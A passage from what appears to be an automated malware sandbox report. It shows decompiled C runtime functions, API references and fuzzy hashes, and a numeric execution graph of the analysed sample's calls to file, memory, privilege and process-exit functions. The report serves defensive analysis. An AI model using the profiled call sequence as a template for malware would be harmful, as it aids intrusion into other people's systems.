					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00F2917B( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t41 = _v20;
							_t59 = 1;
							_t28 = _t41 + 4; // 0x840ffff8
							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E00F21CC3();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0xe1c11fe1
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0xe1c11fe1
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0xe1c11fe1
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0xe1c11fe1
						_t18 = _t59 + 4; // 0x840ffff8
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}


















                                          0x00f291ce
                                          0x00f291d3
                                          0x00f291ed
                                          0x00000000
                                          0x00f291ed
                                          0x00f291d5
                                          0x00f291da
                                          0x00000000
                                          0x00000000
                                          0x00f291df
                                          0x00f291fc
                                          0x00f29201
                                          0x00f29204
                                          0x00f2920b
                                          0x00f2922a
                                          0x00f29231
                                          0x00f29233
                                          0x00f29277
                                          0x00f29283
                                          0x00f29286
                                          0x00f2928b
                                          0x00f2928e
                                          0x00f29294
                                          0x00f29296
                                          0x00f292a6
                                          0x00f292a6
                                          0x00f292aa
                                          0x00f292ac
                                          0x00f292af
                                          0x00f292af
                                          0x00f292af
                                          0x00f292af
                                          0x00000000
                                          0x00f292b5
                                          0x00f29298
                                          0x00f29298
                                          0x00f2929d
                                          0x00f2929d
                                          0x00f292a0
                                          0x00000000
                                          0x00f292a0
                                          0x00f29235
                                          0x00f29238
                                          0x00f2923c
                                          0x00f29265
                                          0x00f29265
                                          0x00f29265
                                          0x00f29268
                                          0x00f29268
                                          0x00000000
                                          0x00000000
                                          0x00f2926a
                                          0x00f2926e
                                          0x00000000
                                          0x00000000
                                          0x00f29270
                                          0x00f29270
                                          0x00f29270
                                          0x00000000
                                          0x00f29270
                                          0x00f2923e
                                          0x00f2923e
                                          0x00f29241
                                          0x00000000
                                          0x00000000
                                          0x00f29245
                                          0x00f2924f
                                          0x00f29255
                                          0x00f29258
                                          0x00f2925e
                                          0x00f29261
                                          0x00f29263
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00f29263
                                          0x00f2920d
                                          0x00f29210
                                          0x00f29212
                                          0x00f29217
                                          0x00f29217
                                          0x00f2921c
                                          0x00000000
                                          0x00f2921c
                                          0x00f291e1
                                          0x00f291e6
                                          0x00f291ea
                                          0x00f291ea
                                          0x00000000

                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F291FC
                                          • __isleadbyte_l.LIBCMT ref: 00F2922A
                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 00F29258
                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 00F2928E
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979338255.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000005.00000002.979331640.0000000000F20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979353887.0000000000F33000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979359821.0000000000F37000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: e3c5ecbfb7f4402f8a5ceff8ac18de2e9668d6af25a222035659cdbc9637dd29
                                          • Instruction ID: 34b7bf88b492c4c59b988d285d04bcdaf9f50fc81949221ba18132c730b57abb
                                          • Opcode Fuzzy Hash: e3c5ecbfb7f4402f8a5ceff8ac18de2e9668d6af25a222035659cdbc9637dd29
                                          • Instruction Fuzzy Hash: C131E431A0826AFFDB218F75EC44BAA7BA5FF41320F154128E8648B1E0D7B1D851EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F2A94D Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00F2A94D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00F2AE9E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00F2A9D3(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00F2B119(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00F2B058(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                          0x00f2a950
                                          0x00f2a956
                                          0x00f2a9c9
                                          0x00000000
                                          0x00f2a95d
                                          0x00f2a95d
                                          0x00f2a960
                                          0x00f2a97b
                                          0x00f2a97e
                                          0x00f2a99e
                                          0x00f2a9b0
                                          0x00f2a980
                                          0x00f2a980
                                          0x00f2a983
                                          0x00000000
                                          0x00f2a985
                                          0x00f2a997
                                          0x00f2a997
                                          0x00f2a983
                                          0x00f2a9ce
                                          0x00f2a9d2
                                          0x00f2a962
                                          0x00f2a97a
                                          0x00f2a97a
                                          0x00f2a960

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.979338255.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000005.00000002.979331640.0000000000F20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979353887.0000000000F33000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000005.00000002.979359821.0000000000F37000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction ID: 0f974109ce9aa9442daa4af383d644670cdb3cd038edc5ee5ffd28896f359a78
                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction Fuzzy Hash: 5F014B7244025EFBCF125E85ED518EE3F27BB18354B5A8515FE2958031D336C9B1BB82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:2.5%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:5.5%
                                          Total number of Nodes:618
                                          Total number of Limit Nodes:76
                                          execution_graph 61209 41f250 61212 41b9d0 61209->61212 61213 41b9f6 61212->61213 61224 409160 61213->61224 61215 41ba02 61216 41ba49 61215->61216 61232 40d770 61215->61232 61218 41ba17 61219 41ba2c 61218->61219 61280 41a660 61218->61280 61244 40ac10 61219->61244 61222 41ba3b 61223 41a660 2 API calls 61222->61223 61223->61216 61225 40916d 61224->61225 61283 4090b0 61224->61283 61227 409174 61225->61227 61295 409050 61225->61295 61227->61215 61233 40d79c 61232->61233 61704 40a610 61233->61704 61235 40d7ae 61708 40d680 61235->61708 61238 40d7f2 61238->61218 61239 40d7e1 61239->61238 61243 41a440 2 API calls 61239->61243 61240 40d7d4 61240->61218 61241 40d7c9 61241->61240 61242 41a440 2 API calls 61241->61242 61242->61240 61243->61238 61245 40ac35 61244->61245 61246 40a610 LdrLoadDll 61245->61246 61247 40ac8c 61246->61247 61727 40a290 61247->61727 61249 40af03 61249->61222 61250 40acb2 61250->61249 61736 414ff0 61250->61736 61252 40acf7 61252->61249 61739 407e10 61252->61739 61254 40ad3b 61254->61249 61756 41a4b0 61254->61756 61258 40ad91 61259 40ad98 61258->61259 61768 419fc0 61258->61768 61260 41bee0 2 API calls 61259->61260 61262 40ada5 61260->61262 61262->61222 61264 40ade2 61265 41bee0 2 API calls 61264->61265 61266 40ade9 61265->61266 61266->61222 61267 40adf2 61268 40d800 3 API calls 61267->61268 61269 40ae66 61268->61269 61269->61259 61270 40ae71 61269->61270 61271 41bee0 2 API calls 61270->61271 61272 40ae95 61271->61272 61773 41a010 61272->61773 61275 419fc0 2 API calls 61276 40aed0 61275->61276 61276->61249 61778 419dd0 61276->61778 61279 41a660 2 API calls 61279->61249 61281 41af60 LdrLoadDll 61280->61281 61282 41a67f ExitProcess 61281->61282 61282->61219 61314 418b80 61283->61314 61287 4090d6 61287->61225 61288 4090cc 61288->61287 61321 41b310 61288->61321 61290 409113 61290->61287 61332 408ed0 61290->61332 61292 409133 61338 408920 LdrLoadDll 61292->61338 61294 409145 61294->61225 61296 40906a 61295->61296 61297 41b600 LdrLoadDll 61295->61297 61679 41b600 61296->61679 61297->61296 61300 41b600 LdrLoadDll 61301 409091 61300->61301 61302 40d570 61301->61302 61303 40d589 61302->61303 61687 40a490 61303->61687 61305 40d59c 61691 41a190 61305->61691 61309 40d5c2 61312 40d5ed 61309->61312 61697 41a210 61309->61697 61311 41a440 2 API calls 61313 409185 61311->61313 61312->61311 61313->61215 61315 418b8f 61314->61315 61339 415aa0 61315->61339 61317 4090c3 61318 418a30 61317->61318 61345 41a5b0 61318->61345 61322 41b329 61321->61322 61352 4156a0 61322->61352 61324 41b341 61325 41b34a 61324->61325 61391 41b150 61324->61391 61325->61290 61327 41b35e 61327->61325 61408 419eb0 61327->61408 61657 407210 61332->61657 61334 408ef1 61334->61292 61335 408eea 61335->61334 61670 4074d0 61335->61670 61338->61294 61340 415aae 61339->61340 61342 415aba 61339->61342 61340->61342 61344 415f20 LdrLoadDll 61340->61344 61342->61317 61343 415c0c 61343->61317 61344->61343 61348 41af60 61345->61348 61347 418a45 61347->61288 61349 41afe5 61348->61349 61351 41af6f 61348->61351 61349->61347 61350 415aa0 LdrLoadDll 61350->61349 61351->61349 61351->61350 61353 4159d5 61352->61353 61363 4156b4 61352->61363 61353->61324 61356 4157e0 61419 41a310 61356->61419 61357 4157c3 61476 41a410 LdrLoadDll 61357->61476 61360 4157cd 61360->61324 61361 415807 61362 41bee0 2 API calls 61361->61362 61365 415813 61362->61365 61363->61353 61416 419c00 61363->61416 61364 415999 61367 41a440 2 API calls 61364->61367 61365->61360 61365->61364 61366 4159af 61365->61366 61371 4158a2 61365->61371 61485 4153e0 LdrLoadDll NtReadFile NtClose 61366->61485 61368 4159a0 61367->61368 61368->61324 61370 4159c2 61370->61324 61372 415909 61371->61372 61373 4158b1 61371->61373 61372->61364 61374 41591c 61372->61374 61376 4158b6 61373->61376 61377 4158ca 61373->61377 61478 41a290 61374->61478 61477 4152a0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 61376->61477 61380 4158e7 61377->61380 61381 4158cf 61377->61381 61380->61368 61434 415060 61380->61434 61422 415340 61381->61422 61383 4158c0 61383->61324 61385 41597c 61482 41a440 61385->61482 61386 4158dd 61386->61324 61389 4158ff 61389->61324 61390 415988 61390->61324 61392 41b16b 61391->61392 61393 41b17d 61392->61393 61503 41be60 61392->61503 61393->61327 61395 41b19d 61506 414cc0 61395->61506 61397 41b1c0 61397->61393 61398 414cc0 3 API calls 61397->61398 61401 41b1e2 61398->61401 61400 41b26a 61402 41b27a 61400->61402 61626 41aee0 LdrLoadDll 61400->61626 61401->61393 61531 415fe0 61401->61531 61542 41ad50 61402->61542 61405 41b2a8 61621 419e70 61405->61621 61409 41af60 LdrLoadDll 61408->61409 61410 419ecc 61409->61410 61653 99fae8 LdrInitializeThunk 61410->61653 61411 419ee7 61413 41bee0 61411->61413 61414 41b3b9 61413->61414 61654 41a620 61413->61654 61414->61290 61417 415794 61416->61417 61418 41af60 LdrLoadDll 61416->61418 61417->61356 61417->61357 61417->61360 61418->61417 61420 41a32c NtCreateFile 61419->61420 61421 41af60 LdrLoadDll 61419->61421 61420->61361 61421->61420 61423 41535c 61422->61423 61424 41a290 LdrLoadDll 61423->61424 61425 41537d 61424->61425 61426 415384 61425->61426 61427 415398 61425->61427 61428 41a440 2 API calls 61426->61428 61429 41a440 2 API calls 61427->61429 61430 41538d 61428->61430 61431 4153a1 61429->61431 61430->61386 61486 41c0f0 LdrLoadDll RtlAllocateHeap 61431->61486 61433 4153ac 61433->61386 61435 4150ab 61434->61435 61436 4150de 61434->61436 61438 41a290 LdrLoadDll 61435->61438 61437 415229 61436->61437 61441 4150fa 61436->61441 61439 41a290 LdrLoadDll 61437->61439 61440 4150c6 61438->61440 61446 415244 61439->61446 61442 41a440 2 API calls 61440->61442 61443 41a290 LdrLoadDll 61441->61443 61444 4150cf 61442->61444 61445 415115 61443->61445 61444->61389 61448 415131 61445->61448 61449 41511c 61445->61449 61499 41a2d0 LdrLoadDll 61446->61499 61452 415136 61448->61452 61453 41514c 61448->61453 61451 41a440 2 API calls 61449->61451 61450 41527e 61454 41a440 2 API calls 61450->61454 61455 415125 61451->61455 61456 41a440 2 API calls 61452->61456 61462 415151 61453->61462 61487 41c0b0 61453->61487 61459 415289 61454->61459 61455->61389 61457 41513f 61456->61457 61457->61389 61458 415163 61458->61389 61459->61389 61462->61458 61490 41a3c0 61462->61490 61463 4151b7 61464 4151ce 61463->61464 61498 41a250 LdrLoadDll 61463->61498 61465 4151d5 61464->61465 61466 4151ea 61464->61466 61468 41a440 2 API calls 61465->61468 61469 41a440 2 API calls 61466->61469 61468->61458 61470 4151f3 61469->61470 61471 41521f 61470->61471 61493 41bcb0 61470->61493 61471->61389 61473 41520a 61474 41bee0 2 API calls 61473->61474 61475 415213 61474->61475 61475->61389 61476->61360 61477->61383 61479 415964 61478->61479 61480 41af60 LdrLoadDll 61478->61480 61481 41a2d0 LdrLoadDll 61479->61481 61480->61479 61481->61385 61483 41af60 LdrLoadDll 61482->61483 61484 41a45c NtClose 61483->61484 61484->61390 61485->61370 61486->61433 61489 41c0c8 61487->61489 61500 41a5e0 61487->61500 61489->61462 61491 41af60 LdrLoadDll 61490->61491 61492 41a3dc NtReadFile 61491->61492 61492->61463 61494 41bcd4 61493->61494 61495 41bcbd 61493->61495 61494->61473 61495->61494 61496 41c0b0 2 API calls 61495->61496 61497 41bceb 61496->61497 61497->61473 61498->61464 61499->61450 61501 41af60 LdrLoadDll 61500->61501 61502 41a5fc RtlAllocateHeap 61501->61502 61502->61489 61627 41a4f0 61503->61627 61505 41be8d 61505->61395 61507 414cd1 61506->61507 61509 414cd9 61506->61509 61507->61397 61508 414fac 61508->61397 61509->61508 61630 41d090 61509->61630 61511 414d2d 61512 41d090 2 API calls 61511->61512 61516 414d38 61512->61516 61513 414d86 61515 41d090 2 API calls 61513->61515 61517 414d9a 61515->61517 61516->61513 61635 41d130 61516->61635 61518 41d090 2 API calls 61517->61518 61520 414e0d 61518->61520 61519 41d090 2 API calls 61528 414e55 61519->61528 61520->61519 61522 414f84 61642 41d0f0 LdrLoadDll RtlFreeHeap 61522->61642 61524 414f8e 61643 41d0f0 LdrLoadDll RtlFreeHeap 61524->61643 61526 414f98 61644 41d0f0 LdrLoadDll RtlFreeHeap 61526->61644 61641 41d0f0 LdrLoadDll RtlFreeHeap 61528->61641 61529 414fa2 61645 41d0f0 LdrLoadDll RtlFreeHeap 61529->61645 61532 415ff1 61531->61532 61533 4156a0 8 API calls 61532->61533 61538 416007 61533->61538 61534 416010 61534->61400 61535 416047 61536 41bee0 2 API calls 61535->61536 61537 416058 61536->61537 61537->61400 61538->61534 61538->61535 61539 416093 61538->61539 61540 41bee0 2 API calls 61539->61540 61541 416098 61540->61541 61541->61400 61543 41ad64 61542->61543 61544 41abe0 LdrLoadDll 61542->61544 61646 41abe0 61543->61646 61544->61543 61546 41ad6d 61547 41abe0 LdrLoadDll 61546->61547 61548 41ad76 61547->61548 61549 41abe0 LdrLoadDll 61548->61549 61550 41ad7f 61549->61550 61551 41abe0 LdrLoadDll 61550->61551 61552 41ad88 61551->61552 61553 41abe0 LdrLoadDll 61552->61553 61554 41ad91 61553->61554 61555 41abe0 LdrLoadDll 61554->61555 61556 41ad9d 61555->61556 61557 41abe0 LdrLoadDll 61556->61557 61558 41ada6 61557->61558 61559 41abe0 LdrLoadDll 61558->61559 61560 41adaf 61559->61560 61561 41abe0 LdrLoadDll 61560->61561 61562 41adb8 61561->61562 61563 41abe0 LdrLoadDll 61562->61563 61564 41adc1 61563->61564 61565 41abe0 LdrLoadDll 61564->61565 61566 41adca 61565->61566 61567 41abe0 LdrLoadDll 61566->61567 61568 41add6 61567->61568 61569 41abe0 LdrLoadDll 61568->61569 61570 41addf 61569->61570 61571 41abe0 LdrLoadDll 61570->61571 61572 41ade8 61571->61572 61573 41abe0 LdrLoadDll 61572->61573 61574 41adf1 61573->61574 61575 41abe0 LdrLoadDll 61574->61575 61576 41adfa 61575->61576 61577 41abe0 LdrLoadDll 61576->61577 61578 41ae03 61577->61578 61579 41abe0 LdrLoadDll 61578->61579 61580 41ae0f 61579->61580 61581 41abe0 LdrLoadDll 61580->61581 61582 41ae18 61581->61582 61583 41abe0 LdrLoadDll 61582->61583 61584 41ae21 61583->61584 61585 41abe0 LdrLoadDll 61584->61585 61586 41ae2a 61585->61586 61587 41abe0 LdrLoadDll 61586->61587 61588 41ae33 61587->61588 61589 41abe0 LdrLoadDll 61588->61589 61590 41ae3c 61589->61590 61591 41abe0 LdrLoadDll 61590->61591 61592 41ae48 61591->61592 61593 41abe0 LdrLoadDll 61592->61593 61594 41ae51 61593->61594 61595 41abe0 LdrLoadDll 61594->61595 61596 41ae5a 61595->61596 61597 41abe0 LdrLoadDll 61596->61597 61598 41ae63 61597->61598 61599 41abe0 LdrLoadDll 61598->61599 61600 41ae6c 61599->61600 61601 41abe0 LdrLoadDll 61600->61601 61602 41ae75 61601->61602 61603 41abe0 LdrLoadDll 61602->61603 61604 41ae81 61603->61604 61605 41abe0 LdrLoadDll 61604->61605 61606 41ae8a 61605->61606 61607 41abe0 LdrLoadDll 61606->61607 61608 41ae93 61607->61608 61609 41abe0 LdrLoadDll 61608->61609 61610 41ae9c 61609->61610 61611 41abe0 LdrLoadDll 61610->61611 61612 41aea5 61611->61612 61613 41abe0 LdrLoadDll 61612->61613 61614 41aeae 61613->61614 61615 41abe0 LdrLoadDll 61614->61615 61616 41aeba 61615->61616 61617 41abe0 LdrLoadDll 61616->61617 61618 41aec3 61617->61618 61619 41abe0 LdrLoadDll 61618->61619 61620 41aecc 61619->61620 61620->61405 61622 41af60 LdrLoadDll 61621->61622 61623 419e8c 61622->61623 61652 99fdc0 LdrInitializeThunk 61623->61652 61624 419ea3 61624->61327 61626->61402 61628 41a50c NtAllocateVirtualMemory 61627->61628 61629 41af60 LdrLoadDll 61627->61629 61628->61505 61629->61628 61631 41d0a0 61630->61631 61632 41d0a6 61630->61632 61631->61511 61633 41c0b0 2 API calls 61632->61633 61634 41d0cc 61633->61634 61634->61511 61636 41d140 61635->61636 61637 41c0b0 2 API calls 61636->61637 61638 41d18d 61636->61638 61639 41d16a 61637->61639 61638->61516 61640 41bee0 2 API calls 61639->61640 61640->61638 61641->61522 61642->61524 61643->61526 61644->61529 61645->61508 61647 41abfb 61646->61647 61648 415aa0 LdrLoadDll 61647->61648 61649 41ac1b 61648->61649 61650 415aa0 LdrLoadDll 61649->61650 61651 41accf 61649->61651 61650->61651 61651->61546 61651->61651 61652->61624 61653->61411 61655 41af60 LdrLoadDll 61654->61655 61656 41a63c RtlFreeHeap 61655->61656 61656->61414 61658 407220 61657->61658 61659 40721b 61657->61659 61660 41be60 2 API calls 61658->61660 61659->61335 61667 407245 61660->61667 61661 4072a8 61661->61335 61662 419e70 2 API calls 61662->61667 61663 4072ae 61665 4072d4 61663->61665 61666 41a570 2 API calls 61663->61666 61665->61335 61668 4072c5 61666->61668 61667->61661 61667->61662 61667->61663 61669 41be60 2 API calls 61667->61669 61673 41a570 61667->61673 61668->61335 61669->61667 61671 41a570 2 API calls 61670->61671 61672 4074ee 61671->61672 61672->61292 61674 41a58c 61673->61674 61675 41af60 LdrLoadDll 61673->61675 61678 99fb68 LdrInitializeThunk 61674->61678 61675->61674 61676 41a5a3 61676->61667 61678->61676 61680 41b623 61679->61680 61683 40a140 61680->61683 61684 40a164 61683->61684 61685 40a1a0 LdrLoadDll 61684->61685 61686 40907b 61684->61686 61685->61686 61686->61300 61688 40a4b3 61687->61688 61690 40a530 61688->61690 61702 419c40 LdrLoadDll 61688->61702 61690->61305 61692 41af60 LdrLoadDll 61691->61692 61693 40d5ab 61692->61693 61693->61313 61694 41a780 61693->61694 61695 41af60 LdrLoadDll 61694->61695 61696 41a79f LookupPrivilegeValueW 61695->61696 61696->61309 61698 41af60 LdrLoadDll 61697->61698 61699 41a22c 61698->61699 61703 99fed0 LdrInitializeThunk 61699->61703 61700 41a24b 61700->61312 61702->61690 61703->61700 61705 40a637 61704->61705 61706 40a490 LdrLoadDll 61705->61706 61707 40a666 61706->61707 61707->61235 61709 40d69a 61708->61709 61717 40d750 61708->61717 61710 40a490 LdrLoadDll 61709->61710 61711 40d6bc 61710->61711 61718 419ef0 61711->61718 61713 40d6fe 61721 419f30 61713->61721 61716 41a440 2 API calls 61716->61717 61717->61239 61717->61241 61719 419f0c 61718->61719 61720 41af60 LdrLoadDll 61718->61720 61719->61713 61720->61719 61722 419f4c 61721->61722 61723 41af60 LdrLoadDll 61721->61723 61726 9a07ac LdrInitializeThunk 61722->61726 61723->61722 61724 40d744 61724->61716 61726->61724 61728 40a2a1 61727->61728 61729 40a29d 61727->61729 61730 40a2ec 61728->61730 61732 40a2ba 61728->61732 61729->61250 61784 419c80 LdrLoadDll 61730->61784 61783 419c80 LdrLoadDll 61732->61783 61733 40a2fd 61733->61250 61735 40a2dc 61735->61250 61737 40d800 3 API calls 61736->61737 61738 415016 61737->61738 61738->61252 61740 407e2e 61739->61740 61754 407edc 61739->61754 61741 407210 4 API calls 61740->61741 61749 407e38 61741->61749 61742 407f9c 61746 407fba 61742->61746 61818 40da70 10 API calls 61742->61818 61743 407210 4 API calls 61751 407efd 61743->61751 61745 407fb0 61745->61254 61746->61254 61748 407b10 17 API calls 61748->61751 61750 407ed2 61749->61750 61749->61754 61785 407b10 61749->61785 61752 4074d0 2 API calls 61750->61752 61751->61742 61751->61748 61753 407f92 61751->61753 61752->61754 61755 4074d0 2 API calls 61753->61755 61754->61742 61754->61743 61754->61746 61755->61742 61757 41af60 LdrLoadDll 61756->61757 61758 41a4cc 61757->61758 61956 99fea0 LdrInitializeThunk 61758->61956 61759 40ad72 61761 40d800 61759->61761 61762 40d81d 61761->61762 61957 419f70 61762->61957 61765 40d865 61765->61258 61766 419fc0 2 API calls 61767 40d88e 61766->61767 61767->61258 61769 41af60 LdrLoadDll 61768->61769 61770 419fdc 61769->61770 61964 99fc60 LdrInitializeThunk 61770->61964 61771 40add5 61771->61264 61771->61267 61774 41af60 LdrLoadDll 61773->61774 61775 41a02c 61774->61775 61965 99fc90 LdrInitializeThunk 61775->61965 61776 40aea9 61776->61275 61779 41af60 LdrLoadDll 61778->61779 61780 419dec 61779->61780 61966 9a0078 LdrInitializeThunk 61780->61966 61781 40aefc 61781->61279 61783->61735 61784->61733 61786 407b35 61785->61786 61819 419cc0 61786->61819 61789 407b89 61789->61749 61790 407c0a 61854 40d950 LdrLoadDll NtClose 61790->61854 61791 419eb0 2 API calls 61792 407bad 61791->61792 61792->61790 61794 407bb8 61792->61794 61796 407c36 61794->61796 61822 40af10 61794->61822 61795 407c25 61797 407c2c 61795->61797 61800 407c42 61795->61800 61796->61749 61799 41a440 2 API calls 61797->61799 61799->61796 61855 419d40 LdrLoadDll 61800->61855 61801 407bd2 61801->61796 61842 407940 61801->61842 61804 407c6d 61805 40af10 5 API calls 61804->61805 61807 407c8d 61805->61807 61807->61796 61856 419d70 LdrLoadDll 61807->61856 61809 407cb2 61857 419e00 LdrLoadDll 61809->61857 61811 407ccc 61812 419dd0 2 API calls 61811->61812 61813 407cdb 61812->61813 61814 41a440 2 API calls 61813->61814 61815 407ce5 61814->61815 61858 407710 61815->61858 61817 407cf9 61817->61749 61818->61745 61820 407b7f 61819->61820 61821 41af60 LdrLoadDll 61819->61821 61820->61789 61820->61790 61820->61791 61821->61820 61825 40af3b 61822->61825 61823 40d800 3 API calls 61824 40af9a 61823->61824 61826 419fc0 2 API calls 61824->61826 61835 40afe3 61824->61835 61825->61823 61827 40afc5 61826->61827 61828 40afcc 61827->61828 61829 40afef 61827->61829 61830 41a010 2 API calls 61828->61830 61833 40b059 61829->61833 61834 40b039 61829->61834 61831 40afd9 61830->61831 61832 41a440 2 API calls 61831->61832 61832->61835 61837 41a010 2 API calls 61833->61837 61836 41a440 2 API calls 61834->61836 61835->61801 61838 40b046 61836->61838 61839 40b06b 61837->61839 61838->61801 61840 41a440 2 API calls 61839->61840 61841 40b075 61840->61841 61841->61801 61843 407956 61842->61843 61874 419830 61843->61874 61845 40796f 61850 407ae1 61845->61850 61895 407510 61845->61895 61847 407a55 61848 407710 11 API calls 61847->61848 61847->61850 61849 407a83 61848->61849 61849->61850 61851 419eb0 2 API calls 61849->61851 61850->61749 61852 407ab8 61851->61852 61852->61850 61853 41a4b0 2 API calls 61852->61853 61853->61850 61854->61795 61855->61804 61856->61809 61857->61811 61859 407739 61858->61859 61935 407680 61859->61935 61862 41a4b0 2 API calls 61863 40774c 61862->61863 61863->61862 61864 4077d7 61863->61864 61866 4077d2 61863->61866 61943 40d9d0 61863->61943 61864->61817 61865 41a440 2 API calls 61867 40780a 61865->61867 61866->61865 61867->61864 61868 419cc0 LdrLoadDll 61867->61868 61869 40786f 61868->61869 61869->61864 61947 419d00 61869->61947 61871 4078d3 61871->61864 61872 4156a0 8 API calls 61871->61872 61873 407928 61872->61873 61873->61817 61875 41c0b0 2 API calls 61874->61875 61876 419847 61875->61876 61902 408760 61876->61902 61878 419862 61879 4198a0 61878->61879 61880 419889 61878->61880 61882 41be60 2 API calls 61879->61882 61881 41bee0 2 API calls 61880->61881 61883 419896 61881->61883 61884 4198da 61882->61884 61883->61845 61885 41be60 2 API calls 61884->61885 61886 4198f3 61885->61886 61892 419b94 61886->61892 61908 41bea0 61886->61908 61889 419b80 61890 41bee0 2 API calls 61889->61890 61891 419b8a 61890->61891 61891->61845 61893 41bee0 2 API calls 61892->61893 61894 419be9 61893->61894 61894->61845 61896 40760f 61895->61896 61897 407525 61895->61897 61896->61847 61897->61896 61898 4156a0 8 API calls 61897->61898 61899 407592 61898->61899 61900 41bee0 2 API calls 61899->61900 61901 4075b9 61899->61901 61900->61901 61901->61847 61903 408785 61902->61903 61904 40a140 LdrLoadDll 61903->61904 61905 4087b8 61904->61905 61907 4087dd 61905->61907 61911 40b940 61905->61911 61907->61878 61929 41a530 61908->61929 61912 40b96c 61911->61912 61913 41a190 LdrLoadDll 61912->61913 61914 40b985 61913->61914 61915 40b98c 61914->61915 61922 41a1d0 61914->61922 61915->61907 61919 40b9c7 61920 41a440 2 API calls 61919->61920 61921 40b9ea 61920->61921 61921->61907 61923 41af60 LdrLoadDll 61922->61923 61924 41a1ec 61923->61924 61928 99fbb8 LdrInitializeThunk 61924->61928 61925 40b9af 61925->61915 61927 41a7c0 LdrLoadDll 61925->61927 61927->61919 61928->61925 61930 41af60 LdrLoadDll 61929->61930 61931 41a54c 61930->61931 61934 9a0048 LdrInitializeThunk 61931->61934 61932 419b79 61932->61889 61932->61892 61934->61932 61936 407698 61935->61936 61937 40a140 LdrLoadDll 61936->61937 61938 4076b3 61937->61938 61939 415aa0 LdrLoadDll 61938->61939 61940 4076c3 61939->61940 61941 4076cc 